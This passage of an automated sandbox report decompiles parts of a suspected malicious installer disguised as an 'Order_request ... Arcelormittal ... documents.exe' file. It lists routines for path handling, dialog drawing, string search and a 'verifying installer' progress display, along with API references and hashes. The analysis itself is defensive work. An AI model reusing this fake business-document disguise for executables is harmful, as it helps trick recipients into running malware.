                                                0x1000231f
                                                0x10002335
                                                0x00000000
                                                0x10002335
                                                0x1000230d
                                                0x1000230d
                                                0x10002336
                                                0x10002336
                                                0x10002338
                                                0x1000233c
                                                0x1000233c
                                                0x1000233f
                                                0x1000233f
                                                0x10002347
                                                0x10002349
                                                0x10002350
                                                0x10002415
                                                0x10002416
                                                0x10002421
                                                0x1000244b
                                                0x1000244b
                                                0x10002431
                                                0x1000243d
                                                0x10002433
                                                0x10002433
                                                0x10002433
                                                0x00000000
                                                0x10002356
                                                0x10002356
                                                0x00000000
                                                0x1000235d
                                                0x00000000
                                                0x00000000
                                                0x10002366
                                                0x00000000
                                                0x00000000
                                                0x10002374
                                                0x10002376
                                                0x00000000
                                                0x00000000
                                                0x10002397
                                                0x1000239d
                                                0x100023a0
                                                0x100023a2
                                                0x100023b2
                                                0x00000000
                                                0x00000000
                                                0x1000237f
                                                0x10002384
                                                0x10002387
                                                0x10002388
                                                0x00000000
                                                0x00000000
                                                0x100023be
                                                0x100023c4
                                                0x100023c5
                                                0x100023c8
                                                0x100023c9
                                                0x100023cb
                                                0x00000000
                                                0x00000000
                                                0x100023dc
                                                0x100023df
                                                0x100023eb
                                                0x100023ed
                                                0x00000000
                                                0x00000000
                                                0x100023f9
                                                0x10002405
                                                0x10002408
                                                0x1000240a
                                                0x1000240d
                                                0x00000000
                                                0x00000000
                                                0x10002356
                                                0x10002350
                                                0x1000232b
                                                0x10002330
                                                0x00000000
                                                0x10002330

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 10002416
                                                  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID: @h)w
                                                • API String ID: 4216380887-1991468749
                                                • Opcode ID: 629548a8d80b156119ca260ddfff41e2ac9599e7dc7e49857da4672f8da03f10
                                                • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                • Opcode Fuzzy Hash: 629548a8d80b156119ca260ddfff41e2ac9599e7dc7e49857da4672f8da03f10
                                                • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004062C6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 91%
                                                			E004062C6(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405A5D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405A13(L"*?|<>/\":", _t5))) == 0) {
							E00405BC2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                0x004062c8
                                                0x004062d1
                                                0x004062e8
                                                0x004062e8
                                                0x004062ef
                                                0x004062fb
                                                0x004062fb
                                                0x004062fe
                                                0x00406301
                                                0x00406306
                                                0x00406308
                                                0x00406311
                                                0x00406315
                                                0x00406332
                                                0x0040633a
                                                0x0040633a
                                                0x0040633f
                                                0x00406341
                                                0x00406344
                                                0x00406349
                                                0x0040634a
                                                0x0040634e
                                                0x0040634e
                                                0x0040634f
                                                0x00406356
                                                0x00406358
                                                0x0040635f
                                                0x00000000
                                                0x00000000
                                                0x00406367
                                                0x0040636d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040636d
                                                0x00406372

                                                APIs
                                                • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000,00403258,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 00406329
                                                • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 00406338
                                                • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000,00403258,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 0040633D
                                                • CharPrevW.USER32(0040A300,0040A300,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000,00403258,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 00406350
                                                Strings
                                                • "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 0040630A
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004062C7
                                                • *?|<>/":, xrefs: 00406318
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                • API String ID: 589700163-2447577730
                                                • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                • Instruction ID: d4b317f752b3f13875bb624486170839a033bb9266efc580798c69349bd43794
                                                • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                • Instruction Fuzzy Hash: 4611041580061295DB307B148D40AB7A2B8FF95754F42803FED86732C0E77C9CA286ED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040415D Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040415D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                0x0040416f
                                                0x00404203
                                                0x00000000
                                                0x00404203
                                                0x00404180
                                                0x00404184
                                                0x00000000
                                                0x00000000
                                                0x0040418a
                                                0x00404193
                                                0x00404196
                                                0x00404196
                                                0x0040419c
                                                0x004041a2
                                                0x004041a2
                                                0x004041ae
                                                0x004041b4
                                                0x004041bb
                                                0x004041be
                                                0x004041c1
                                                0x004041c3
                                                0x004041c3
                                                0x004041cb
                                                0x004041d1
                                                0x004041d1
                                                0x004041db
                                                0x004041e0
                                                0x004041e3
                                                0x004041e8
                                                0x004041eb
                                                0x004041eb
                                                0x004041fb
                                                0x004041fb
                                                0x00000000

                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040417A
                                                • GetSysColor.USER32(00000000), ref: 00404196
                                                • SetTextColor.GDI32(?,00000000), ref: 004041A2
                                                • SetBkMode.GDI32(?,?), ref: 004041AE
                                                • GetSysColor.USER32(?), ref: 004041C1
                                                • SetBkColor.GDI32(?,?), ref: 004041D1
                                                • DeleteObject.GDI32(?), ref: 004041EB
                                                • CreateBrushIndirect.GDI32(?), ref: 004041F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                • Instruction ID: 369debbde0f7a754f16ab48c9af260ce6490938065ace01aa15cf7b70dd2699c
                                                • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                • Instruction Fuzzy Hash: 5F218EB1500704ABCB219F68DE08B5BBBF8AF41710F04892DF996E66A0C734E948CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404A5B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404A5B(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                0x00404a69
                                                0x00404a76
                                                0x00404a7c
                                                0x00404aba
                                                0x00404aba
                                                0x00404ac9
                                                0x00404ad0
                                                0x00000000
                                                0x00404ad2
                                                0x00404a7e
                                                0x00404a8d
                                                0x00404a95
                                                0x00404a98
                                                0x00404aaa
                                                0x00404ab0
                                                0x00404ab7
                                                0x00000000
                                                0x00404ab7
                                                0x00000000

                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A76
                                                • GetMessagePos.USER32 ref: 00404A7E
                                                • ScreenToClient.USER32 ref: 00404A98
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAA
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                • Instruction ID: c6f788746afe21c260c1d9be26cb74e88d19e7ad1034c01b3b76a28530fb3a8b
                                                • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                • Instruction Fuzzy Hash: 37019E71A4021CBADB00DB94DD81FFEBBFCAF54B10F10002BBA11B61C0C7B49A418BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007E1849 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E007E1849(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				int _v8;
				int _t14;
				WCHAR* _t16;
				WCHAR* _t17;
				int _t18;
				int _t23;
				WCHAR* _t31;

				_t14 = lstrlenW(_a8);
				_t31 = _a4;
				_t23 = _t14;
				_v8 = _t23;
				if(lstrlenW(_t31) < _t23) {
					L5:
					_t16 = 0;
				} else {
					_t17 = _t23 + _t23;
					_a4 = _t17;
					while(1) {
						 *(_t17 + _t31) =  *(_t17 + _t31) & 0x00000000;
						_t18 = lstrcmpiW(_t31, _a8);
						 *((short*)(_a4 + _t31)) =  *(_t17 + _t31);
						if(_t18 == 0) {
							break;
						}
						_t31 = CharNextW(_t31);
						if(lstrlenW(_t31) >= _v8) {
							_t17 = _a4;
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t16 = _t31;
				}
				L6:
				return _t16;
			}










                                                0x007e1859
                                                0x007e185b
                                                0x007e185e
                                                0x007e1861
                                                0x007e1868
                                                0x007e18a4
                                                0x007e18a4
                                                0x007e186a
                                                0x007e186a
                                                0x007e186d
                                                0x007e1875
                                                0x007e187c
                                                0x007e1882
                                                0x007e188d
                                                0x007e1891
                                                0x00000000
                                                0x00000000
                                                0x007e189a
                                                0x007e18a2
                                                0x007e1872
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x007e18a2
                                                0x007e18ab
                                                0x007e18ab
                                                0x007e18a6
                                                0x007e18aa

                                                APIs
                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,007E12F5,00000000,/TIMEOUT=,00000000), ref: 007E1859
                                                • lstrlenW.KERNEL32(?,?,?,007E12F5,00000000,/TIMEOUT=,00000000), ref: 007E1864
                                                • lstrcmpiW.KERNEL32(?,?,?,?,007E12F5,00000000,/TIMEOUT=,00000000), ref: 007E1882
                                                • CharNextW.USER32(?,?,?,007E12F5,00000000,/TIMEOUT=,00000000), ref: 007E1894
                                                • lstrlenW.KERNEL32(00000000,?,?,007E12F5,00000000,/TIMEOUT=,00000000), ref: 007E189D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.512316824.00000000007E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007E0000, based on PE: true
                                                • Associated: 00000000.00000002.512304950.00000000007E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512325440.00000000007E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512337115.00000000007E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512347213.00000000007E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7e0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID: i)w
                                                • API String ID: 190613189-1280834553
                                                • Opcode ID: 0dccf5aa36bac529db8ba63558757bd8223a214f62756a2cf846171472bbd0d1
                                                • Instruction ID: b89359cc8c2992788578802cf2799a47f204337d5cb45beebe0649a10aed415e
                                                • Opcode Fuzzy Hash: 0dccf5aa36bac529db8ba63558757bd8223a214f62756a2cf846171472bbd0d1
                                                • Instruction Fuzzy Hash: FA018131602158FFDB11DFA5CC809AD77A8FF093A07658065F904DB221D774DA42DB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 100015FF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41memorylibraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                0x10001619
                                                0x10001625
                                                0x10001632
                                                0x10001639
                                                0x10001642
                                                0x1000164e

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                • GlobalFree.KERNEL32 ref: 10001642
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID: N)w@h)w
                                                • API String ID: 1148316912-3621727588
                                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00402D04(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x78b6f4; // 0x24cc4
					_t11 =  *0x7976fc; // 0x253b8
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                0x00402d14
                                                0x00402d22
                                                0x00402d28
                                                0x00402d28
                                                0x00402d36
                                                0x00402d38
                                                0x00402d3e
                                                0x00402d45
                                                0x00402d47
                                                0x00402d47
                                                0x00402d5d
                                                0x00402d6d
                                                0x00402d7f
                                                0x00402d7f
                                                0x00402d87

                                                APIs
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402D57
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 0571604055d31c6dff79b789c0d870111b8eec90378702650be5945f1294d07a
                                                • Instruction ID: d409429b390960081b576047ff97edc042c2651f1908c05eaab55558fb75af6b
                                                • Opcode Fuzzy Hash: 0571604055d31c6dff79b789c0d870111b8eec90378702650be5945f1294d07a
                                                • Instruction Fuzzy Hash: 1B01447064020DAFEF149F61DD49BEA3B69AF04304F008039FA45A91D0DBB89955CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 76%
                                                			E100024A9(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B9))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
